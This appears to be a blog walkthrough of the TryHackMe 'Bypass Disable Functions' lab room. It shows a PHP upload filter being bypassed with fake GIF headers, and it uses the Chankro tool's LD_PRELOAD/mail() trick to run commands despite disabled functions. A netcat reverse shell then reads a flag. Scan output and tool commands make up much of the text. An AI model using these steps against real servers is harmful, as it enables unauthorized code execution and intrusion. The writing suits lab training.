Bypass Disable Functions
Practice bypassing disabled dangerous features that run operating system commands or start processes.
This vulnerability occurs in web applications where there is the possibility of uploading a file without being checked by a security system that curbs potential dangers.
It allows an attacker to upload files with code (scripts such as .php, .aspx and more) and run them on the same server, more information in this room.
Among the typically applied measures is disabling dangerous functions that could execute operating system commands or start processes. Functions such as system() or shell_exec() are often disabled through PHP directives defined in the php.ini configuration file. Other functions, perhaps less known as dl() (which allows you to load a PHP extension dynamically), can go unnoticed by the system administrator and not be disabled. The usual thing in an intrusion test is to list which functions are enabled in case any have been forgotten.
One of the easiest techniques to implement and not very widespread is to abuse the mail() and putenv() functionalities. This technique is not new, it was already reported to PHP in 2008 by gat3way, but it still works to this day. Through the putenv() function, we can modify the environment variables, allowing us to assign the value we want to the variable LD_PRELOAD. Roughly LD_PRELOAD will allow us to pre-load a .so library before the rest of the libraries, so that if a program uses a function of a library (libc.so for example), it will execute the one in our library instead of the one it should. In this way, we can hijack or "hook" functions, modifying their behaviour at will.
Chankro: tool to evade disable_functions and open_basedir
Through Chankro, we generate a PHP script that will act as a dropper, creating on the server a .so library and the binary (a meterpreter, for example) or bash script (reverse shell, for example) that we want to execute freely, and that will later call putenv() and mail() to launch the process.
Install tool:
git clone https://github.com/TarlogicSecurity/Chankro.git
cd Chankro
python2 chankro.py --help
python chankro.py --arch 64 --input c.sh --output tryhackme.php --path /var/www/html
--arch = Architecture of system victim 32 o 64.
--input = file with your payload to execute
--output = Name of the PHP file you are going to create; this is the file you will need to upload.
--path = It is necessary to specify the absolute path where our uploaded PHP file is located. For example, if our file is located in the uploads folder DOCUMENTROOT + uploads.
Now, when executing the PHP script in the web server, the necessary files will be created to execute our payload.
My command run successfully, and I created a file in the directory with the output of the command.
First of all we will start machine of tryhackme room bypass disable function and after search room's IP what do we see there!! there is upload page where we can upload a any image and execution file via Burp Suite because we have to upload by bypassing the PHP file.
and after uploading malicious file we have to check in which directory the file is uploaded? so for this we will use gobuster for find a directory.
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-bypassdisablefunction/Chankro]
└─$ gobuster dir -u http://10.10.61.162/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 100 -x php
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.61.162/
[+] Method: GET
[+] Threads: 100
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php
[+] Timeout: 10s
===============================================================
2021/09/16 12:23:04 Starting gobuster in directory enumeration mode
===============================================================
/uploads (Status: 301) [Size: 314] [--> http://10.10.61.162/uploads/]
/assets (Status: 301) [Size: 313] [--> http://10.10.61.162/assets/]
/cv.php (Status: 200) [Size: 4153]
Progress: 98580 / 441122 (22.35%)
if you want to check which port is open in this site then you can do this with NMAP or RUSTSCAN.
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-bypassdisablefunction/Chankro]
└─$ rustscan -a 10.10.61.162 --ulimit 5000 -- -A -oN rustscan.txt 1 ⨯
[~] Automatically increasing ulimit value to 5000.
Open 10.10.61.162:22
Open 10.10.61.162:80
[~] Starting Nmap
[>] The Nmap command to be run is nmap -A -oN rustscan.txt -vvv -p 22,80 10.10.61.162
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-16 12:17 IST
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 12:17
Completed NSE at 12:17, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 12:17
Completed NSE at 12:17, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 12:17
Completed NSE at 12:17, 0.00s elapsed
Initiating Ping Scan at 12:17
Scanning 10.10.61.162 [2 ports]
Completed Ping Scan at 12:17, 0.24s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 12:17
Completed Parallel DNS resolution of 1 host. at 12:17, 0.07s elapsed
DNS resolution of 1 IPs took 0.07s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 12:17
Scanning 10.10.61.162 [2 ports]
Discovered open port 22/tcp on 10.10.61.162
Discovered open port 80/tcp on 10.10.61.162
Completed Connect Scan at 12:17, 0.23s elapsed (2 total ports)
Initiating Service scan at 12:17
Scanning 2 services on 10.10.61.162
Completed Service scan at 12:17, 6.50s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.61.162.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 12:17
Completed NSE at 12:17, 9.83s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 12:17
Completed NSE at 12:17, 1.21s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 12:17
Completed NSE at 12:17, 0.00s elapsed
Nmap scan report for 10.10.61.162
Host is up, received syn-ack (0.24s latency).
Scanned at 2021-09-16 12:17:30 IST for 18s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 1f:97:54:30:24:74:f2:fa:15:ed:f3:35:84:dc:6c:d0 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCimETxFw3xwql560SXGeR88EX/FNiDVNYE4k7xBkwrl7+5YctrnqdNtGrZO2Ki3Zav9TlGBjtRcQ2GOadDlKpLXasXzkiv3nl58+d/VNlhFvaQP1zK5w0f+31KrZnH9EfL9oEv1UZ6UCmJM1O4uvcxYoUOfj0HQJ/27bMGwPETSnWyxVkaBpY34vukFqrlL9HoPTQATrcmxwFSnDh0yn7tSHdNMa8vIlD4lek0q9NG10tBThCTDyXgLnE3++fkutFMSQZ/6EA1tnRFcFK+YgMCRqxTrfr0nQr5JZykseVNO+gpcUY1NDVUlCdMV0xK+WTlukJoRIyfm68P/BZmkyBT
| 256 a7:21:78:6d:a6:05:7e:5a:0f:7e:53:65:0a:c4:53:49 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBEb8bpOpxmuRcQAiMJGyKijMw+otZD9IxXMkjgL6k2HJCA1bvpPqk7rxHbDexKDvY3MgNPAx50Mp6tttsOaVXQ=
| 256 57:1c:22:ac:59:69:62:cb:94:bd:e9:9f:67:68:23:c9 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHXfZcsCOQCeq6/HAIKcCimntv0KNHPvqXbsDiXH6WaD
80/tcp open http syn-ack Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Ecorp - Jobs
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 12:17
Completed NSE at 12:17, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 12:17
Completed NSE at 12:17, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 12:17
Completed NSE at 12:17, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.37 seconds
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-bypassdisablefunction/Chankro]
└─$
We got a file uploaded directory /uploads
when listing the web with the tool wappalyzer you can see that the web has as a programming language PHP
With this in we can see that the file mind phpinfo.php is available, this file gives us information about the server configuration and the settings to interpret a php for example.
Looking at the information that gives us, phpinfo we can see a section called disable_funtions and in it many critical variables are set, such as:
exec
passthru
shell_exec
system
proc_open
popen
curl_exec
curl_multi_exec
As we can see that we are very limited when it comes to uploading a file php which contains malicious code for our benefit but investigating and thanks to the information provided by this machine we can make use of the tool Chankro .
This tool allows us to execute commands through the mail () and putenv () functions by changing an environment variable with which it executes the binary sendmail . An explanation of what it does is at a low level explained in this article .
To test if the tool works we are going to execute a whoami and deposit it in the absolute path of the web, which is hosted in /var/www/html/fa5fba5f5a39d27d8bb7fe5f518e00db/ this is known since in phpinfo you can see the path in where the web is hosted.
I will use the tool Chankro with the following paramters but before we create a c.sh file
sudo nano c.sh
python chankro.py --arch 64 --input c.sh --output tryhackme.php --path /var/www/html
--arch = Architecture of system victim 32 o 64.
--input = file with your payload to execute
--output = Name of the PHP file you are going to create; this is the file you will need to upload.
--path = It is necessary to specify the absolute path where our uploaded PHP file is located. For example, if our file is located in the uploads folder DOCUMENTROOT + uploads.
┌──(hackerboy㉿KumarAtulJaiswal)-[/opt/Chankro]
└─$ sudo python chankro.py --arch 64 --input c.sh --output hackingtruth-exploit.php --path /var/www/html/fa5fba5f5a39d27d8bb7fe5f518e00db/uploads
-=[ Chankro ]=-
-={ @TheXC3LL }=-
[+] Binary file: c.sh
[+] Architecture: x64
[+] Final PHP: hackingtruth-exploit.php
[+] File created!
┌──(hackerboy㉿KumarAtulJaiswal)-[/opt/Chankro]
└─$
once the malicious file is created, it creates the file for us, i will php go to the web and upload it.
and file uploading time we intercept the request and changed the content-type (image/jpeg) and write a GIF87a
What is GIF87a?
GIF87a is the original format for indexed color images. It uses LZW compression and has the option of being interlaced. GIF89a is the same, but also includes transparency and animationcapabilities.
check a file uploaded or not in /uploads directory
Gaining Access
Now that we can see that commands can be executed at the system level, I will modify the file command.sh and add code that when it is executed I will start a revershell to my machine on port 443:
With this in mind and already modified the file command.sh I recreate the file winsad.php with Chankro and once created I add the header 'GIF89a;' and upload the file.
Since I went back up the php and going to the path where is hosted winsad.php I can see that the code interprets me and gives me the shell :
Start a netcat listener and click on that uploaded file-
nc -nvlp 4444
Once inside the machine we can go to the user's directory s4vi and view the flag.
www-data@ubuntu:/var/www/html/fa5fba5f5a39d27d8bb7fe5f518e00db/uploads$ cd /home
<ml/fa5fba5f5a39d27d8bb7fe5f518e00db/uploads$ cd /home
www-data@ubuntu:/home$ ls -la
ls -la
total 12
drwxr-xr-x 3 root root 4096 Jun 22 08:12 .
drwxr-xr-x 22 root root 4096 Jun 23 18:59 ..
drwxr-xr-x 4 s4vi s4vi 4096 Jun 23 23:34 s4vi
www-data@ubuntu:/home$ cd s4vi
cd s4vi
www-data@ubuntu:/home/s4vi$
ls -la
www-data@ubuntu:/home/s4vi$ ls -la
total 44
drwxr-xr-x 4 s4vi s4vi 4096 Jun 23 23:34 .
drwxr-xr-x 3 root root 4096 Jun 22 08:12 ..
-rw------- 1 root root 6127 Jun 23 23:49 .bash_history
-rw-r--r-- 1 s4vi s4vi 220 Jun 22 08:12 .bash_logout
-rw-r--r-- 1 s4vi s4vi 3771 Jun 22 08:12 .bashrc
drwx------ 2 s4vi s4vi 4096 Jun 22 09:46 .cache
drwxrwxr-x 2 s4vi s4vi 4096 Jun 23 23:33 .nano
-rw-r--r-- 1 s4vi s4vi 655 Jun 22 08:12 .profile
-rw-r--r-- 1 s4vi s4vi 0 Jun 23 17:59 .sudo_as_admin_successful
-rw-r--r-- 1 root root 183 Jun 23 23:29 .wget-hsts
-rw-rw-r-- 1 s4vi s4vi 37 Jun 23 23:34 flag.txt
www-data@ubuntu:/home/s4vi$
www-data@ubuntu:/home/s4vi$ cat flag.txt
cat cat flag.txt
cat: cat: No such file or directory
thm{bypass_d1sable_functions_1n_php}
www-data@ubuntu:/home/s4vi$
We got it!!!
Disclaimer
All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. we do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.
- Hacking Truth by Kumar Atul Jaiswal